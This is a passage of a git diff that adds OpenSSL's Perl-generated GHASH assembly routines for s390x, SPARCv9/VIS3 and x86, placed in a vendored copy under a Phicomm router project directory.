+
+$Zhi="%r0";
+$Zlo="%r1";
+
+$Xi="%r2";	# argument block
+$Htbl="%r3";
+$inp="%r4";
+$len="%r5";
+
+$rem0="%r6";	# variables
+$rem1="%r7";
+$nlo="%r8";
+$nhi="%r9";
+$xi="%r10";
+$cnt="%r11";
+$tmp="%r12";
+$x78="%r13";
+$rem_4bit="%r14";
+
+$sp="%r15";
+
+$code.=<<___;
+.text
+
+.globl	gcm_gmult_4bit
+.align	32
+gcm_gmult_4bit:
+___
+$code.=<<___ if(!$softonly && 0);	# hardware is slow for single block...
+	larl	%r1,OPENSSL_s390xcap_P
+	lg	%r0,0(%r1)
+	tmhl	%r0,0x4000	# check for message-security-assist
+	jz	.Lsoft_gmult
+	lghi	%r0,0
+	la	%r1,16($sp)
+	.long	0xb93e0004	# kimd %r0,%r4
+	lg	%r1,24($sp)
+	tmhh	%r1,0x4000	# check for function 65
+	jz	.Lsoft_gmult
+	stg	%r0,16($sp)	# arrange 16 bytes of zero input
+	stg	%r0,24($sp)
+	lghi	%r0,65		# function 65
+	la	%r1,0($Xi)	# H lies right after Xi in gcm128_context
+	la	$inp,16($sp)
+	lghi	$len,16
+	.long	0xb93e0004	# kimd %r0,$inp
+	brc	1,.-4		# pay attention to "partial completion"
+	br	%r14
+.align	32
+.Lsoft_gmult:
+___
+$code.=<<___;
+	stm${g}	%r6,%r14,6*$SIZE_T($sp)
+
+	aghi	$Xi,-1
+	lghi	$len,1
+	lghi	$x78,`0xf<<3`
+	larl	$rem_4bit,rem_4bit
+
+	lg	$Zlo,8+1($Xi)		# Xi
+	j	.Lgmult_shortcut
+.type	gcm_gmult_4bit,\@function
+.size	gcm_gmult_4bit,(.-gcm_gmult_4bit)
+
+.globl	gcm_ghash_4bit
+.align	32
+gcm_ghash_4bit:
+___
+$code.=<<___ if(!$softonly);
+	larl	%r1,OPENSSL_s390xcap_P
+	lg	%r0,0(%r1)
+	tmhl	%r0,0x4000	# check for message-security-assist
+	jz	.Lsoft_ghash
+	lghi	%r0,0
+	la	%r1,16($sp)
+	.long	0xb93e0004	# kimd %r0,%r4
+	lg	%r1,24($sp)
+	tmhh	%r1,0x4000	# check for function 65
+	jz	.Lsoft_ghash
+	lghi	%r0,65		# function 65
+	la	%r1,0($Xi)	# H lies right after Xi in gcm128_context
+	.long	0xb93e0004	# kimd %r0,$inp
+	brc	1,.-4		# pay attention to "partial completion"
+	br	%r14
+.align	32
+.Lsoft_ghash:
+___
+$code.=<<___ if ($flavour =~ /3[12]/);
+	llgfr	$len,$len
+___
+$code.=<<___;
+	stm${g}	%r6,%r14,6*$SIZE_T($sp)
+
+	aghi	$Xi,-1
+	srlg	$len,$len,4
+	lghi	$x78,`0xf<<3`
+	larl	$rem_4bit,rem_4bit
+
+	lg	$Zlo,8+1($Xi)		# Xi
+	lg	$Zhi,0+1($Xi)
+	lghi	$tmp,0
+.Louter:
+	xg	$Zhi,0($inp)		# Xi ^= inp 
+	xg	$Zlo,8($inp)
+	xgr	$Zhi,$tmp
+	stg	$Zlo,8+1($Xi)
+	stg	$Zhi,0+1($Xi)
+
+.Lgmult_shortcut:
+	lghi	$tmp,0xf0
+	sllg	$nlo,$Zlo,4
+	srlg	$xi,$Zlo,8		# extract second byte
+	ngr	$nlo,$tmp
+	lgr	$nhi,$Zlo
+	lghi	$cnt,14
+	ngr	$nhi,$tmp
+
+	lg	$Zlo,8($nlo,$Htbl)
+	lg	$Zhi,0($nlo,$Htbl)
+
+	sllg	$nlo,$xi,4
+	sllg	$rem0,$Zlo,3
+	ngr	$nlo,$tmp
+	ngr	$rem0,$x78
+	ngr	$xi,$tmp
+
+	sllg	$tmp,$Zhi,60
+	srlg	$Zlo,$Zlo,4
+	srlg	$Zhi,$Zhi,4
+	xg	$Zlo,8($nhi,$Htbl)
+	xg	$Zhi,0($nhi,$Htbl)
+	lgr	$nhi,$xi
+	sllg	$rem1,$Zlo,3
+	xgr	$Zlo,$tmp
+	ngr	$rem1,$x78
+	sllg	$tmp,$Zhi,60
+	j	.Lghash_inner
+.align	16
+.Lghash_inner:
+	srlg	$Zlo,$Zlo,4
+	srlg	$Zhi,$Zhi,4
+	xg	$Zlo,8($nlo,$Htbl)
+	llgc	$xi,0($cnt,$Xi)
+	xg	$Zhi,0($nlo,$Htbl)
+	sllg	$nlo,$xi,4
+	xg	$Zhi,0($rem0,$rem_4bit)
+	nill	$nlo,0xf0
+	sllg	$rem0,$Zlo,3
+	xgr	$Zlo,$tmp
+	ngr	$rem0,$x78
+	nill	$xi,0xf0
+
+	sllg	$tmp,$Zhi,60
+	srlg	$Zlo,$Zlo,4
+	srlg	$Zhi,$Zhi,4
+	xg	$Zlo,8($nhi,$Htbl)
+	xg	$Zhi,0($nhi,$Htbl)
+	lgr	$nhi,$xi
+	xg	$Zhi,0($rem1,$rem_4bit)
+	sllg	$rem1,$Zlo,3
+	xgr	$Zlo,$tmp
+	ngr	$rem1,$x78
+	sllg	$tmp,$Zhi,60
+	brct	$cnt,.Lghash_inner
+
+	srlg	$Zlo,$Zlo,4
+	srlg	$Zhi,$Zhi,4
+	xg	$Zlo,8($nlo,$Htbl)
+	xg	$Zhi,0($nlo,$Htbl)
+	sllg	$xi,$Zlo,3
+	xg	$Zhi,0($rem0,$rem_4bit)
+	xgr	$Zlo,$tmp
+	ngr	$xi,$x78
+
+	sllg	$tmp,$Zhi,60
+	srlg	$Zlo,$Zlo,4
+	srlg	$Zhi,$Zhi,4
+	xg	$Zlo,8($nhi,$Htbl)
+	xg	$Zhi,0($nhi,$Htbl)
+	xgr	$Zlo,$tmp
+	xg	$Zhi,0($rem1,$rem_4bit)
+
+	lg	$tmp,0($xi,$rem_4bit)
+	la	$inp,16($inp)
+	sllg	$tmp,$tmp,4		# correct last rem_4bit[rem]
+	brctg	$len,.Louter
+
+	xgr	$Zhi,$tmp
+	stg	$Zlo,8+1($Xi)
+	stg	$Zhi,0+1($Xi)
+	lm${g}	%r6,%r14,6*$SIZE_T($sp)
+	br	%r14
+.type	gcm_ghash_4bit,\@function
+.size	gcm_ghash_4bit,(.-gcm_ghash_4bit)
+
+.align	64
+rem_4bit:
+	.long	`0x0000<<12`,0,`0x1C20<<12`,0,`0x3840<<12`,0,`0x2460<<12`,0
+	.long	`0x7080<<12`,0,`0x6CA0<<12`,0,`0x48C0<<12`,0,`0x54E0<<12`,0
+	.long	`0xE100<<12`,0,`0xFD20<<12`,0,`0xD940<<12`,0,`0xC560<<12`,0
+	.long	`0x9180<<12`,0,`0x8DA0<<12`,0,`0xA9C0<<12`,0,`0xB5E0<<12`,0
+.type	rem_4bit,\@object
+.size	rem_4bit,(.-rem_4bit)
+.string	"GHASH for s390x, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-sparcv9.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-sparcv9.pl
new file mode 100644
index 0000000..0365e0f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-sparcv9.pl
@@ -0,0 +1,571 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# March 2010
+#
+# The module implements "4-bit" GCM GHASH function and underlying
+# single multiplication operation in GF(2^128). "4-bit" means that it
+# uses 256 bytes per-key table [+128 bytes shared table]. Performance
+# results are for streamed GHASH subroutine on UltraSPARC pre-Tx CPU
+# and are expressed in cycles per processed byte, less is better:
+#
+#		gcc 3.3.x	cc 5.2		this assembler
+#
+# 32-bit build	81.4		43.3		12.6	(+546%/+244%)
+# 64-bit build	20.2		21.2		12.6	(+60%/+68%)
+#
+# Here is data collected on UltraSPARC T1 system running Linux:
+#
+#		gcc 4.4.1			this assembler
+#
+# 32-bit build	566				50	(+1000%)
+# 64-bit build	56				50	(+12%)
+#
+# I don't quite understand why difference between 32-bit and 64-bit
+# compiler-generated code is so big. Compilers *were* instructed to
+# generate code for UltraSPARC and should have used 64-bit registers
+# for Z vector (see C code) even in 32-bit build... Oh well, it only
+# means more impressive improvement coefficients for this assembler
+# module;-) Loops are aggressively modulo-scheduled in respect to
+# references to input data and Z.hi updates to achieve 12 cycles
+# timing. To anchor to something else, sha1-sparcv9.pl spends 11.6
+# cycles to process one byte on UltraSPARC pre-Tx CPU and ~24 on T1.
+#
+# October 2012
+#
+# Add VIS3 lookup-table-free implementation using polynomial
+# multiplication xmulx[hi] and extended addition addxc[cc]
+# instructions. 4.52/7.63x improvement on T3/T4 or in absolute
+# terms 7.90/2.14 cycles per byte. On T4 multi-process benchmark
+# saturates at ~15.5x single-process result on 8-core processor,
+# or ~20.5GBps per 2.85GHz socket.
+
+$bits=32;
+for (@ARGV)     { $bits=64 if (/\-m64/ || /\-xarch\=v9/); }
+if ($bits==64)  { $bias=2047; $frame=192; }
+else            { $bias=0;    $frame=112; }
+
+$output=shift;
+open STDOUT,">$output";
+
+$Zhi="%o0";	# 64-bit values
+$Zlo="%o1";
+$Thi="%o2";
+$Tlo="%o3";
+$rem="%o4";
+$tmp="%o5";
+
+$nhi="%l0";	# small values and pointers
+$nlo="%l1";
+$xi0="%l2";
+$xi1="%l3";
+$rem_4bit="%l4";
+$remi="%l5";
+$Htblo="%l6";
+$cnt="%l7";
+
+$Xi="%i0";	# input argument block
+$Htbl="%i1";
+$inp="%i2";
+$len="%i3";
+
+$code.=<<___ if ($bits==64);
+.register	%g2,#scratch
+.register	%g3,#scratch
+___
+$code.=<<___;
+.section	".text",#alloc,#execinstr
+
+.align	64
+rem_4bit:
+	.long	`0x0000<<16`,0,`0x1C20<<16`,0,`0x3840<<16`,0,`0x2460<<16`,0
+	.long	`0x7080<<16`,0,`0x6CA0<<16`,0,`0x48C0<<16`,0,`0x54E0<<16`,0
+	.long	`0xE100<<16`,0,`0xFD20<<16`,0,`0xD940<<16`,0,`0xC560<<16`,0
+	.long	`0x9180<<16`,0,`0x8DA0<<16`,0,`0xA9C0<<16`,0,`0xB5E0<<16`,0
+.type	rem_4bit,#object
+.size	rem_4bit,(.-rem_4bit)
+
+.globl	gcm_ghash_4bit
+.align	32
+gcm_ghash_4bit:
+	save	%sp,-$frame,%sp
+	ldub	[$inp+15],$nlo
+	ldub	[$Xi+15],$xi0
+	ldub	[$Xi+14],$xi1
+	add	$len,$inp,$len
+	add	$Htbl,8,$Htblo
+
+1:	call	.+8
+	add	%o7,rem_4bit-1b,$rem_4bit
+
+.Louter:
+	xor	$xi0,$nlo,$nlo
+	and	$nlo,0xf0,$nhi
+	and	$nlo,0x0f,$nlo
+	sll	$nlo,4,$nlo
+	ldx	[$Htblo+$nlo],$Zlo
+	ldx	[$Htbl+$nlo],$Zhi
+
+	ldub	[$inp+14],$nlo
+
+	ldx	[$Htblo+$nhi],$Tlo
+	and	$Zlo,0xf,$remi
+	ldx	[$Htbl+$nhi],$Thi
+	sll	$remi,3,$remi
+	ldx	[$rem_4bit+$remi],$rem
+	srlx	$Zlo,4,$Zlo
+	mov	13,$cnt
+	sllx	$Zhi,60,$tmp
+	xor	$Tlo,$Zlo,$Zlo
+	srlx	$Zhi,4,$Zhi
+	xor	$Zlo,$tmp,$Zlo
+
+	xor	$xi1,$nlo,$nlo
+	and	$Zlo,0xf,$remi
+	and	$nlo,0xf0,$nhi
+	and	$nlo,0x0f,$nlo
+	ba	.Lghash_inner
+	sll	$nlo,4,$nlo
+.align	32
+.Lghash_inner:
+	ldx	[$Htblo+$nlo],$Tlo
+	sll	$remi,3,$remi
+	xor	$Thi,$Zhi,$Zhi
+	ldx	[$Htbl+$nlo],$Thi
+	srlx	$Zlo,4,$Zlo
+	xor	$rem,$Zhi,$Zhi
+	ldx	[$rem_4bit+$remi],$rem
+	sllx	$Zhi,60,$tmp
+	xor	$Tlo,$Zlo,$Zlo
+	ldub	[$inp+$cnt],$nlo
+	srlx	$Zhi,4,$Zhi
+	xor	$Zlo,$tmp,$Zlo
+	ldub	[$Xi+$cnt],$xi1
+	xor	$Thi,$Zhi,$Zhi
+	and	$Zlo,0xf,$remi
+
+	ldx	[$Htblo+$nhi],$Tlo
+	sll	$remi,3,$remi
+	xor	$rem,$Zhi,$Zhi
+	ldx	[$Htbl+$nhi],$Thi
+	srlx	$Zlo,4,$Zlo
+	ldx	[$rem_4bit+$remi],$rem
+	sllx	$Zhi,60,$tmp
+	xor	$xi1,$nlo,$nlo
+	srlx	$Zhi,4,$Zhi
+	and	$nlo,0xf0,$nhi
+	addcc	$cnt,-1,$cnt
+	xor	$Zlo,$tmp,$Zlo
+	and	$nlo,0x0f,$nlo
+	xor	$Tlo,$Zlo,$Zlo
+	sll	$nlo,4,$nlo
+	blu	.Lghash_inner
+	and	$Zlo,0xf,$remi
+
+	ldx	[$Htblo+$nlo],$Tlo
+	sll	$remi,3,$remi
+	xor	$Thi,$Zhi,$Zhi
+	ldx	[$Htbl+$nlo],$Thi
+	srlx	$Zlo,4,$Zlo
+	xor	$rem,$Zhi,$Zhi
+	ldx	[$rem_4bit+$remi],$rem
+	sllx	$Zhi,60,$tmp
+	xor	$Tlo,$Zlo,$Zlo
+	srlx	$Zhi,4,$Zhi
+	xor	$Zlo,$tmp,$Zlo
+	xor	$Thi,$Zhi,$Zhi
+
+	add	$inp,16,$inp
+	cmp	$inp,$len
+	be,pn	`$bits==64?"%xcc":"%icc"`,.Ldone
+	and	$Zlo,0xf,$remi
+
+	ldx	[$Htblo+$nhi],$Tlo
+	sll	$remi,3,$remi
+	xor	$rem,$Zhi,$Zhi
+	ldx	[$Htbl+$nhi],$Thi
+	srlx	$Zlo,4,$Zlo
+	ldx	[$rem_4bit+$remi],$rem
+	sllx	$Zhi,60,$tmp
+	xor	$Tlo,$Zlo,$Zlo
+	ldub	[$inp+15],$nlo
+	srlx	$Zhi,4,$Zhi
+	xor	$Zlo,$tmp,$Zlo
+	xor	$Thi,$Zhi,$Zhi
+	stx	$Zlo,[$Xi+8]
+	xor	$rem,$Zhi,$Zhi
+	stx	$Zhi,[$Xi]
+	srl	$Zlo,8,$xi1
+	and	$Zlo,0xff,$xi0
+	ba	.Louter
+	and	$xi1,0xff,$xi1
+.align	32
+.Ldone:
+	ldx	[$Htblo+$nhi],$Tlo
+	sll	$remi,3,$remi
+	xor	$rem,$Zhi,$Zhi
+	ldx	[$Htbl+$nhi],$Thi
+	srlx	$Zlo,4,$Zlo
+	ldx	[$rem_4bit+$remi],$rem
+	sllx	$Zhi,60,$tmp
+	xor	$Tlo,$Zlo,$Zlo
+	srlx	$Zhi,4,$Zhi
+	xor	$Zlo,$tmp,$Zlo
+	xor	$Thi,$Zhi,$Zhi
+	stx	$Zlo,[$Xi+8]
+	xor	$rem,$Zhi,$Zhi
+	stx	$Zhi,[$Xi]
+
+	ret
+	restore
+.type	gcm_ghash_4bit,#function
+.size	gcm_ghash_4bit,(.-gcm_ghash_4bit)
+___
+
+undef $inp;
+undef $len;
+
+$code.=<<___;
+.globl	gcm_gmult_4bit
+.align	32
+gcm_gmult_4bit:
+	save	%sp,-$frame,%sp
+	ldub	[$Xi+15],$nlo
+	add	$Htbl,8,$Htblo
+
+1:	call	.+8
+	add	%o7,rem_4bit-1b,$rem_4bit
+
+	and	$nlo,0xf0,$nhi
+	and	$nlo,0x0f,$nlo
+	sll	$nlo,4,$nlo
+	ldx	[$Htblo+$nlo],$Zlo
+	ldx	[$Htbl+$nlo],$Zhi
+
+	ldub	[$Xi+14],$nlo
+
+	ldx	[$Htblo+$nhi],$Tlo
+	and	$Zlo,0xf,$remi
+	ldx	[$Htbl+$nhi],$Thi
+	sll	$remi,3,$remi
+	ldx	[$rem_4bit+$remi],$rem
+	srlx	$Zlo,4,$Zlo
+	mov	13,$cnt
+	sllx	$Zhi,60,$tmp
+	xor	$Tlo,$Zlo,$Zlo
+	srlx	$Zhi,4,$Zhi
+	xor	$Zlo,$tmp,$Zlo
+
+	and	$Zlo,0xf,$remi
+	and	$nlo,0xf0,$nhi
+	and	$nlo,0x0f,$nlo
+	ba	.Lgmult_inner
+	sll	$nlo,4,$nlo
+.align	32
+.Lgmult_inner:
+	ldx	[$Htblo+$nlo],$Tlo
+	sll	$remi,3,$remi
+	xor	$Thi,$Zhi,$Zhi
+	ldx	[$Htbl+$nlo],$Thi
+	srlx	$Zlo,4,$Zlo
+	xor	$rem,$Zhi,$Zhi
+	ldx	[$rem_4bit+$remi],$rem
+	sllx	$Zhi,60,$tmp
+	xor	$Tlo,$Zlo,$Zlo
+	ldub	[$Xi+$cnt],$nlo
+	srlx	$Zhi,4,$Zhi
+	xor	$Zlo,$tmp,$Zlo
+	xor	$Thi,$Zhi,$Zhi
+	and	$Zlo,0xf,$remi
+
+	ldx	[$Htblo+$nhi],$Tlo
+	sll	$remi,3,$remi
+	xor	$rem,$Zhi,$Zhi
+	ldx	[$Htbl+$nhi],$Thi
+	srlx	$Zlo,4,$Zlo
+	ldx	[$rem_4bit+$remi],$rem
+	sllx	$Zhi,60,$tmp
+	srlx	$Zhi,4,$Zhi
+	and	$nlo,0xf0,$nhi
+	addcc	$cnt,-1,$cnt
+	xor	$Zlo,$tmp,$Zlo
+	and	$nlo,0x0f,$nlo
+	xor	$Tlo,$Zlo,$Zlo
+	sll	$nlo,4,$nlo
+	blu	.Lgmult_inner
+	and	$Zlo,0xf,$remi
+
+	ldx	[$Htblo+$nlo],$Tlo
+	sll	$remi,3,$remi
+	xor	$Thi,$Zhi,$Zhi
+	ldx	[$Htbl+$nlo],$Thi
+	srlx	$Zlo,4,$Zlo
+	xor	$rem,$Zhi,$Zhi
+	ldx	[$rem_4bit+$remi],$rem
+	sllx	$Zhi,60,$tmp
+	xor	$Tlo,$Zlo,$Zlo
+	srlx	$Zhi,4,$Zhi
+	xor	$Zlo,$tmp,$Zlo
+	xor	$Thi,$Zhi,$Zhi
+	and	$Zlo,0xf,$remi
+
+	ldx	[$Htblo+$nhi],$Tlo
+	sll	$remi,3,$remi
+	xor	$rem,$Zhi,$Zhi
+	ldx	[$Htbl+$nhi],$Thi
+	srlx	$Zlo,4,$Zlo
+	ldx	[$rem_4bit+$remi],$rem
+	sllx	$Zhi,60,$tmp
+	xor	$Tlo,$Zlo,$Zlo
+	srlx	$Zhi,4,$Zhi
+	xor	$Zlo,$tmp,$Zlo
+	xor	$Thi,$Zhi,$Zhi
+	stx	$Zlo,[$Xi+8]
+	xor	$rem,$Zhi,$Zhi
+	stx	$Zhi,[$Xi]
+
+	ret
+	restore
+.type	gcm_gmult_4bit,#function
+.size	gcm_gmult_4bit,(.-gcm_gmult_4bit)
+___
+
+{{{
+# Straightforward 128x128-bit multiplication using Karatsuba algorithm
+# followed by pair of 64-bit reductions [with a shortcut in first one,
+# which allowed to break dependency between reductions and remove one
+# multiplication from critical path]. While it might be suboptimal
+# with regard to sheer number of multiplications, other methods [such
+# as aggregate reduction] would require more 64-bit registers, which
+# we don't have in 32-bit application context.
+
+($Xip,$Htable,$inp,$len)=map("%i$_",(0..3));
+
+($Hhl,$Hlo,$Hhi,$Xlo,$Xhi,$xE1,$sqr, $C0,$C1,$C2,$C3,$V)=
+	(map("%o$_",(0..5,7)),map("%g$_",(1..5)));
+
+($shl,$shr)=map("%l$_",(0..7));
+
+# For details regarding "twisted H" see ghash-x86.pl.
+$code.=<<___;
+.globl	gcm_init_vis3
+.align	32
+gcm_init_vis3:
+	save	%sp,-$frame,%sp
+
+	ldx	[%i1+0],$Hhi
+	ldx	[%i1+8],$Hlo
+	mov	0xE1,$Xhi
+	mov	1,$Xlo
+	sllx	$Xhi,57,$Xhi
+	srax	$Hhi,63,$C0		! broadcast carry
+	addcc	$Hlo,$Hlo,$Hlo		! H<<=1
+	addxc	$Hhi,$Hhi,$Hhi
+	and	$C0,$Xlo,$Xlo
+	and	$C0,$Xhi,$Xhi
+	xor	$Xlo,$Hlo,$Hlo
+	xor	$Xhi,$Hhi,$Hhi
+	stx	$Hlo,[%i0+8]		! save twisted H
+	stx	$Hhi,[%i0+0]
+
+	sethi	%hi(0xA0406080),$V
+	sethi	%hi(0x20C0E000),%l0
+	or	$V,%lo(0xA0406080),$V
+	or	%l0,%lo(0x20C0E000),%l0
+	sllx	$V,32,$V
+	or	%l0,$V,$V		! (0xE0·i)&0xff=0xA040608020C0E000
+	stx	$V,[%i0+16]
+
+	ret
+	restore
+.type	gcm_init_vis3,#function
+.size	gcm_init_vis3,.-gcm_init_vis3
+
+.globl	gcm_gmult_vis3
+.align	32
+gcm_gmult_vis3:
+	save	%sp,-$frame,%sp
+
+	ldx	[$Xip+8],$Xlo		! load Xi
+	ldx	[$Xip+0],$Xhi
+	ldx	[$Htable+8],$Hlo	! load twisted H
+	ldx	[$Htable+0],$Hhi
+
+	mov	0xE1,%l7
+	sllx	%l7,57,$xE1		! 57 is not a typo
+	ldx	[$Htable+16],$V		! (0xE0·i)&0xff=0xA040608020C0E000
+
+	xor	$Hhi,$Hlo,$Hhl		! Karatsuba pre-processing
+	xmulx	$Xlo,$Hlo,$C0
+	xor	$Xlo,$Xhi,$C2		! Karatsuba pre-processing
+	xmulx	$C2,$Hhl,$C1
+	xmulxhi	$Xlo,$Hlo,$Xlo
+	xmulxhi	$C2,$Hhl,$C2
+	xmulxhi	$Xhi,$Hhi,$C3
+	xmulx	$Xhi,$Hhi,$Xhi
+
+	sll	$C0,3,$sqr
+	srlx	$V,$sqr,$sqr		! ·0xE0 [implicit &(7<<3)]
+	xor	$C0,$sqr,$sqr
+	sllx	$sqr,57,$sqr		! ($C0·0xE1)<<1<<56 [implicit &0x7f]
+
+	xor	$C0,$C1,$C1		! Karatsuba post-processing
+	xor	$Xlo,$C2,$C2
+	 xor	$sqr,$Xlo,$Xlo		! real destination is $C1
+	xor	$C3,$C2,$C2
+	xor	$Xlo,$C1,$C1
+	xor	$Xhi,$C2,$C2
+	xor	$Xhi,$C1,$C1
+
+	xmulxhi	$C0,$xE1,$Xlo		! ·0xE1<<1<<56
+	 xor	$C0,$C2,$C2
+	xmulx	$C1,$xE1,$C0
+	 xor	$C1,$C3,$C3
+	xmulxhi	$C1,$xE1,$C1
+
+	xor	$Xlo,$C2,$C2
+	xor	$C0,$C2,$C2
+	xor	$C1,$C3,$C3
+
+	stx	$C2,[$Xip+8]		! save Xi
+	stx	$C3,[$Xip+0]
+
+	ret
+	restore
+.type	gcm_gmult_vis3,#function
+.size	gcm_gmult_vis3,.-gcm_gmult_vis3
+
+.globl	gcm_ghash_vis3
+.align	32
+gcm_ghash_vis3:
+	save	%sp,-$frame,%sp
+
+	ldx	[$Xip+8],$C2		! load Xi
+	ldx	[$Xip+0],$C3
+	ldx	[$Htable+8],$Hlo	! load twisted H
+	ldx	[$Htable+0],$Hhi
+
+	mov	0xE1,%l7
+	sllx	%l7,57,$xE1		! 57 is not a typo
+	ldx	[$Htable+16],$V		! (0xE0·i)&0xff=0xA040608020C0E000
+
+	and	$inp,7,$shl
+	andn	$inp,7,$inp
+	sll	$shl,3,$shl
+	prefetch [$inp+63], 20
+	sub	%g0,$shl,$shr
+
+	xor	$Hhi,$Hlo,$Hhl		! Karatsuba pre-processing
+.Loop:
+	ldx	[$inp+8],$Xlo
+	brz,pt	$shl,1f
+	ldx	[$inp+0],$Xhi
+
+	ldx	[$inp+16],$C1		! align data
+	srlx	$Xlo,$shr,$C0
+	sllx	$Xlo,$shl,$Xlo
+	sllx	$Xhi,$shl,$Xhi
+	srlx	$C1,$shr,$C1
+	or	$C0,$Xhi,$Xhi
+	or	$C1,$Xlo,$Xlo
+1:
+	add	$inp,16,$inp
+	sub	$len,16,$len
+	xor	$C2,$Xlo,$Xlo
+	xor	$C3,$Xhi,$Xhi
+	prefetch [$inp+63], 20
+
+	xmulx	$Xlo,$Hlo,$C0
+	xor	$Xlo,$Xhi,$C2		! Karatsuba pre-processing
+	xmulx	$C2,$Hhl,$C1
+	xmulxhi	$Xlo,$Hlo,$Xlo
+	xmulxhi	$C2,$Hhl,$C2
+	xmulxhi	$Xhi,$Hhi,$C3
+	xmulx	$Xhi,$Hhi,$Xhi
+
+	sll	$C0,3,$sqr
+	srlx	$V,$sqr,$sqr		! ·0xE0 [implicit &(7<<3)]
+	xor	$C0,$sqr,$sqr
+	sllx	$sqr,57,$sqr		! ($C0·0xE1)<<1<<56 [implicit &0x7f]
+
+	xor	$C0,$C1,$C1		! Karatsuba post-processing
+	xor	$Xlo,$C2,$C2
+	 xor	$sqr,$Xlo,$Xlo		! real destination is $C1
+	xor	$C3,$C2,$C2
+	xor	$Xlo,$C1,$C1
+	xor	$Xhi,$C2,$C2
+	xor	$Xhi,$C1,$C1
+
+	xmulxhi	$C0,$xE1,$Xlo		! ·0xE1<<1<<56
+	 xor	$C0,$C2,$C2
+	xmulx	$C1,$xE1,$C0
+	 xor	$C1,$C3,$C3
+	xmulxhi	$C1,$xE1,$C1
+
+	xor	$Xlo,$C2,$C2
+	xor	$C0,$C2,$C2
+	brnz,pt	$len,.Loop
+	xor	$C1,$C3,$C3
+
+	stx	$C2,[$Xip+8]		! save Xi
+	stx	$C3,[$Xip+0]
+
+	ret
+	restore
+.type	gcm_ghash_vis3,#function
+.size	gcm_ghash_vis3,.-gcm_ghash_vis3
+___
+}}}
+$code.=<<___;
+.asciz	"GHASH for SPARCv9/VIS3, CRYPTOGAMS by <appro\@openssl.org>"
+.align	4
+___
+
+
+# Purpose of these subroutines is to explicitly encode VIS instructions,
+# so that one can compile the module without having to specify VIS
+# extentions on compiler command line, e.g. -xarch=v9 vs. -xarch=v9a.
+# Idea is to reserve for option to produce "universal" binary and let
+# programmer detect if current CPU is VIS capable at run-time.
+sub unvis3 {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24 );
+my ($ref,$opf);
+my %visopf = (	"addxc"		=> 0x011,
+		"addxccc"	=> 0x013,
+		"xmulx"		=> 0x115,
+		"xmulxhi"	=> 0x116	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if ($opf=$visopf{$mnemonic}) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%([goli])([0-9])/);
+	    $_=$bias{$1}+$2;
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+
+	s/\b(xmulx[hi]*|addxc[c]{0,2})\s+(%[goli][0-7]),\s*(%[goli][0-7]),\s*(%[goli][0-7])/
+		&unvis3($1,$2,$3,$4)
+	 /ge;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-x86.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-x86.pl
new file mode 100644
index 0000000..23a5527
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-x86.pl
@@ -0,0 +1,1393 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# March, May, June 2010
+#
+# The module implements "4-bit" GCM GHASH function and underlying
+# single multiplication operation in GF(2^128). "4-bit" means that it
+# uses 256 bytes per-key table [+64/128 bytes fixed table]. It has two
+# code paths: vanilla x86 and vanilla SSE. Former will be executed on
+# 486 and Pentium, latter on all others. SSE GHASH features so called
+# "528B" variant of "4-bit" method utilizing additional 256+16 bytes
+# of per-key storage [+512 bytes shared table]. Performance results
+# are for streamed GHASH subroutine and are expressed in cycles per
+# processed byte, less is better:
+#
+#		gcc 2.95.3(*)	SSE assembler	x86 assembler
+#
+# Pentium	105/111(**)	-		50
+# PIII		68 /75		12.2		24
+# P4		125/125		17.8		84(***)
+# Opteron	66 /70		10.1		30
+# Core2		54 /67		8.4		18
+# Atom		105/105		16.8		53
+# VIA Nano	69 /71		13.0		27
+#
+# (*)	gcc 3.4.x was observed to generate few percent slower code,
+#	which is one of reasons why 2.95.3 results were chosen,
+#	another reason is lack of 3.4.x results for older CPUs;
+#	comparison with SSE results is not completely fair, because C
+#	results are for vanilla "256B" implementation, while
+#	assembler results are for "528B";-)
+# (**)	second number is result for code compiled with -fPIC flag,
+#	which is actually more relevant, because assembler code is
+#	position-independent;
+# (***)	see comment in non-MMX routine for further details;
+#
+# To summarize, it's >2-5 times faster than gcc-generated code. To
+# anchor it to something else SHA1 assembler processes one byte in
+# ~7 cycles on contemporary x86 cores. As for choice of MMX/SSE
+# in particular, see comment at the end of the file...
+
+# May 2010
+#
+# Add PCLMULQDQ version performing at 2.10 cycles per processed byte.
+# The question is how close is it to theoretical limit? The pclmulqdq
+# instruction latency appears to be 14 cycles and there can't be more
+# than 2 of them executing at any given time. This means that single
+# Karatsuba multiplication would take 28 cycles *plus* few cycles for
+# pre- and post-processing. Then multiplication has to be followed by
+# modulo-reduction. Given that aggregated reduction method [see
+# "Carry-less Multiplication and Its Usage for Computing the GCM Mode"
+# white paper by Intel] allows you to perform reduction only once in
